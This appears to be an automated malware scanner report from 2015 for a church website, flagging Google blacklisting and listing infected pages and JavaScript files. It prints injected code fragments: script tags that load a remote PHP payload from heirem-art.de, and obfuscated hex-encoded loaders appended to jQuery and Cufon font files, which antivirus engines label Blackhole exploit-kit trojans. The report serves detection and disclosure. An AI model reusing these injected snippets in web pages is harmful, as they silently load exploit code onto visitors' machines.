Malware Scanner report for mtmoriahcogic.org

Malicious/Suspicious/Total urls checked: 6/9/15

15 pages have malicious or suspicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "mtmoriahcogic.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mtmoriahcogic.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://mtmoriahcogic.org/	200 OK Content-Length: 10533 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622358"></script>
http://mtmoriahcogic.org/js/jquery-1.7.1.min.js	200 OK Content-Length: 98158 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cu(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView\|\|a.parentWindow:!1}function cr(a){if(!cg[a]){var b=c.body,d=f("<" a ">").appendTo(b),e=d.css("display");d.remove();if(e==="none"\|\|e===""){ch\|\|(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendChild(ch);if(!ci\|\|!ch.createElement)ci=(ch.contentWindow\|\|ch.contentDocument).document,ci.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"") "<html><body>"),ci.close();d=c ... 3151 bytes are skipped ...name ) { var start = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');wjowv09();}} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ikarus Trojan.JS.Quidvetis Rising JS:Trojan.Script.JS.Quidvetis.a!1612880 Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Exploit:JS/Neclu.D Fortinet JS/Blacole.EU!tr.dldr Norman Iframer.BI
http://mtmoriahcogic.org/js/cufon-yui.js	200 OK Content-Length: 2733 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) 7:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69: ... 1762 bytes are skipped ...rt = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');wjowv09();}} //a9a007/ Antivirus reports: AntiVir JS/Blacole.NX Avast JS:Includer-AJE [Trj] Ikarus Trojan.JS.IFrame TrendMicro-HouseCall TROJ_GEN.F47V1230 Comodo UnclassifiedMalware McAfee-GW-Edition JS/Exploit-Blacole.eu DrWeb JS.IFrame.500 Microsoft Trojan:JS/Quidvetis.A McAfee JS/Exploit-Blacole.eu Norman Blacole.XE
http://mtmoriahcogic.org/js/cufon-replace.js	200 OK Content-Length: 6733 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) Cufon.replace('.slogan-top,.gallery-slogan span', { fontFamily: 'Beautiful ES'}); Cufon.replace('.sf-menu > li > a ', { fontFamily: 'OptimusPrincepsSemiBold',textShadow:'1px 1px #19100a',hover:true}); Cufon.replace('.soc span ', { fontFamily: 'OptimusPrincepsSemiBold'}); Cufon.replace('.gallery-slogan strong ', { fontFamily: 'OptimusPrincepsSemiBold',letterSpacing:'-7px'}); ... 3039 bytes are skipped ...name ) { var start = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');wjowv09();}} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ikarus JS.Exploit.BlackHole Rising JS:Trojan.Script.JS.Quidvetis.a!1612880 TrendMicro-HouseCall TROJ_GEN.F47V0101 Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Exploit:JS/Neclu.D NANO-Antivirus Trojan.Script.Expack.chwlwn Norman Blacole.XE GData Win32.Trojan.Agent.NUCFI9
http://mtmoriahcogic.org/js/Beautiful_ES_italic_400.font.js	200 OK Content-Length: 41237 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":86,"face":{"font-family":"Beautiful ES","font-weight":400,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 0 5 3 8 0 0 9 0 2","ascent":"288","descent":"-72","x-height":"3","cap-height":"6","bbox":"-167.381 -270 365.782 146.271","underline-thickness":"10.8","underline-position":"-37.8","slope":"-39","unicode-range":"U 0020-U 007E"},"glyphs":{" ":{"w":55},"!":{"d":"28,-25v47,-44,99,-96,82,-97v-9,0,-17,3,-22,11xm30,-13v-10,-10,-29,5,-19,16v7,1 ... 3033 bytes are skipped ...rt = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');wjowv09();}} //a9a007/ Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ikarus Trojan.JS.Quidvetis Rising JS:Trojan.Script.JS.Quidvetis.a!1612880 TrendMicro-HouseCall TROJ_GEN.F47V0101 Comodo Exploit.JS.Expack.G McAfee-GW-Edition JS/Exploit-Blacole.eu DrWeb JS.IFrame.500 Microsoft Exploit:JS/Neclu.D McAfee JS/Exploit-Blacole.eu NANO-Antivirus Trojan.Script.Expack.chwlwn Norman Blacole.XE GData Win32.Trojan.Agent.OFVB2Q
http://mtmoriahcogic.org/js/OptimusPrincepsSemiBold_600.font.js	200 OK Content-Length: 38218 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":85,"face":{"font-family":"OptimusPrincepsSemiBold","font-weight":600,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 8 5 6 0 0 2 0 4","ascent":"288","descent":"-72","bbox":"0.745166 -297.207 519 91.0637","underline-thickness":"7.2","underline-position":"-44.28","unicode-range":"U 0020-U 007D"},"glyphs":{" ":{"w":87},"!":{"d":"43,-247v-62,-7,-32,128,-21,180v2,2,8,1,8,-2xm7,-37v-2,24,36,27,37,4v2,-21,-37,-29,-37,-4","w":50},"\"":{"d":"72,-192r6,-81v0,-9,-6,-16, ... 3033 bytes are skipped ...rt = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');wjowv09();}} //a9a007/ Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ikarus Trojan.JS.Quidvetis Rising JS:Trojan.Script.JS.Quidvetis.a!1612880 TrendMicro-HouseCall TROJ_GEN.F47V0101 Comodo Exploit.JS.Expack.G McAfee-GW-Edition JS/Exploit-Blacole.eu DrWeb JS.IFrame.500 Microsoft Exploit:JS/Neclu.D McAfee JS/Exploit-Blacole.eu NANO-Antivirus Trojan.Script.Expack.chwlwn Norman Blacole.XE GData Win32.Trojan.Agent.OFVB2Q
http://mtmoriahcogic.org/js/script.js	200 OK Content-Length: 3847 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) 2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5 ... 2876 bytes are skipped ...rt = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');wjowv09();}} //a9a007/ Antivirus reports: AntiVir JS/Blacole.NX Avast JS:Includer-AJE [Trj] Ikarus Trojan.JS.IFrame TrendMicro-HouseCall TROJ_GEN.F47V1230 Comodo UnclassifiedMalware McAfee-GW-Edition JS/Exploit-Blacole.eu DrWeb JS.IFrame.500 Microsoft Trojan:JS/Quidvetis.A McAfee JS/Exploit-Blacole.eu Norman Blacole.XE
http://mtmoriahcogic.org/index.html	200 OK Content-Length: 10533 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622358"></script>
http://mtmoriahcogic.org/index-1.html	200 OK Content-Length: 9637 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622342"></script>
http://mtmoriahcogic.org/index-2.html	200 OK Content-Length: 9025 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622344"></script>
http://mtmoriahcogic.org/index-7.html	200 OK Content-Length: 8047 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622354"></script>
http://mtmoriahcogic.org/more.html	200 OK Content-Length: 9456 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622362"></script>
http://mtmoriahcogic.org/index-3.html	200 OK Content-Length: 5527 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622346"></script>
http://mtmoriahcogic.org/index-4.html	200 OK Content-Length: 8137 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622348"></script>
http://mtmoriahcogic.org/index-5.html	200 OK Content-Length: 9256 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=21622350"></script>

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mtmoriahcogic.org

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 11:05:31 GMT
Accept-Ranges: bytes
ETag: "e2253e8-2925-50e7c7c25fd84"
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 10533
Content-Type: text/html
Last-Modified: Sat, 07 Feb 2015 09:51:45 GMT

...10533 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: mtmoriahcogic.org
Referer: http://www.google.com/search?q=mtmoriahcogic.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for mtmoriahcogic.org

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools